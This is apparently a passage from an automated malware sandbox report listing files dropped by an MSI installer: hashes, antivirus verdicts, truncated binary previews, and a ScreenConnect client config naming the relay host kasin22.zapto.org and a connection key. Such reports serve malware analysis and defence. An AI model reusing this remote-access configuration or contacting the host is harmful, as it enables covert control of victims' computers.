                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADPJ....C.....H.;...........v.......6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.....DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e..1..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..1.... .1........JFIF.............C.............................! ....#'2*#%/%..+;,/35888!*=A<6A2785...C...........5$.$55555555555555555555555555555555555555555555555555...........".....................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):50133
                                                              Entropy (8bit):4.759054454534641
                                                              Encrypted:false
                                                              SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                              MD5:D524E8E6FD04B097F0401B2B668DB303
                                                              SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                              SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                              SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                              Malicious:false
                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):26722
                                                              Entropy (8bit):7.7401940386372345
                                                              Encrypted:false
                                                              SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                              MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                              SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                              SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                              SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                              Malicious:false
                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):197120
                                                              Entropy (8bit):6.58476728626163
                                                              Encrypted:false
                                                              SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                              MD5:AE0E6EBA123683A59CAE340C894260E9
                                                              SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                              SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                              SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Joe Sandbox View:
                                                              • Filename: setup.msi, Detection: malicious, Browse
                                                              • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious, Browse
                                                              • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious, Browse
                                                              • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                              • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                              • Filename: statments.exe, Detection: malicious, Browse
                                                              • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                              • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                              • Filename: sstatment.exe, Detection: malicious, Browse
                                                              • Filename: extukGiBrn.exe, Detection: malicious, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):68096
                                                              Entropy (8bit):6.068776675019683
                                                              Encrypted:false
                                                              SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                              MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                              SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                              SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                              SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):95520
                                                              Entropy (8bit):6.505346220942731
                                                              Encrypted:false
                                                              SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                              MD5:361BCC2CB78C75DD6F583AF81834E447
                                                              SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                              SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                              SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 3%, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):548864
                                                              Entropy (8bit):6.031251664661689
                                                              Encrypted:false
                                                              SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                              MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                              SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                              SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                              SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1721856
                                                              Entropy (8bit):6.639136400085158
                                                              Encrypted:false
                                                              SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                              MD5:9F823778701969823C5A01EF3ECE57B7
                                                              SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                              SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                              SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):260168
                                                              Entropy (8bit):6.416438906122177
                                                              Encrypted:false
                                                              SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                              MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                              SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                              SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                              SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):61216
                                                              Entropy (8bit):6.31175789874945
                                                              Encrypted:false
                                                              SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                              MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                              SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                              SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                              SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):266
                                                              Entropy (8bit):4.842791478883622
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                              Malicious:false
                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):601376
                                                              Entropy (8bit):6.185921191564225
                                                              Encrypted:false
                                                              SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                              MD5:20AB8141D958A58AADE5E78671A719BF
                                                              SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                              SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                              SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):266
                                                              Entropy (8bit):4.842791478883622
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                              Malicious:true
                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):842248
                                                              Entropy (8bit):6.268561504485627
                                                              Encrypted:false
                                                              SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                              MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                              SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                              SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                              SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...|..............@..B................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):81696
                                                              Entropy (8bit):5.862223562830496
                                                              Encrypted:false
                                                              SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                              MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                              SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                              SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                              SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):266
                                                              Entropy (8bit):4.842791478883622
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                              Malicious:false
                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1970
                                                              Entropy (8bit):4.690426481732819
                                                              Encrypted:false
                                                              SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHX:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHN
                                                              MD5:2744E91BB44E575AD8E147E06F8199E3
                                                              SHA1:6795C6B8F0F2DC6D8BD39F9CF971BAB81556B290
                                                              SHA-256:805E6E9447A4838D874D84E6B2CDFF93723641B06726D8EE58D51E8B651CD226
                                                              SHA-512:586EDC48A71FA17CDF092A95D27FCE2341C023B8EA4D93FA2C86CA9B3B3E056FD69BD3644EDBAD1224297BCE9646419036EA442C93778985F839E14776F51498
                                                              Malicious:false
                                                              Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:XML 1.0 document, ASCII text, with very long lines (459), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):949
                                                              Entropy (8bit):5.769288678812284
                                                              Encrypted:false
                                                              SSDEEP:24:2dL9hK6E4dl/PmGu44AUXgzfwM3lTX+5iwntUEvH:chh7HHPMLsfwudX+5i8UEv
                                                              MD5:DF5DE516807A78CD5B80282A31AA2DAD
                                                              SHA1:E0B3800819B77E7B313410C6C20C1D47DBE80B38
                                                              SHA-256:0C2BCA1705F12A54A7908BAE7C9345A0B345318B95934D825F41ABF811229159
                                                              SHA-512:DAD3AE167A1DB03345D2BBF6CDB62AE17403B500CA9BE701BC7EB266B9A3709385FA0214CF7DF5626176A478C3B098CCBE3F3DF75B74B0358EB58B036081A892
                                                              Malicious:false
                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=kasin22.zapto.org&amp;p=8041&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                              Process:C:\Users\user\Desktop\file.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):321
                                                              Entropy (8bit):5.36509199858051
                                                              Encrypted:false
